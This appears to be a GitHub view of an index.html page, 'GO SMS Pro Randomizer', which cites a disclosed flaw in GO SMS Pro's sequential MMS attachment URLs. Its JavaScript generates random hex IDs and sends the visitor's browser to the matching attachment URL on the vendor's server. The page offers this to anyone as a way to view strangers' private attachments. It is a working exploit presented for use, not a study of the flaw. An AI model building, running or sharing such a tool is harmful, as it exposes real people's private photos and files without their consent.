-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathindex.html
31 lines (26 loc) · 1.04 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<!-- start at 10001 end somewhere around 15106600 -->
<html>
<head>
<meta charset="utf-8">
<title>GO SMS Pro Random Attachment</title>
<div style="margin: auto; max-width: 600;">
<h1>GO SMS Pro Randomizer</h1>
<p>A vulnerability was recently made public showing that GO SMS Pro uses a sequential value in the URLs that are
generated to view MMS attachments. Click the button below to view a random attachment!</p>
<p>View the <a
href="https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/go-sms-pro-vulnerable-to-media-file-theft/"
target="_blank">Trustwave Report</a></p>
<button onClick=generate() style="display: block; margin: 20px auto;">Randomize</button>
</div>
</head>
<body>
<script>
function generate() {
var hex = Math.floor(Math.random() * 15106600).toString(16);
var url = `http://gs.3g.cn/D/${hex}/w`;
console.log(url);
window.location.href = url;
}
</script>
</body>
</html>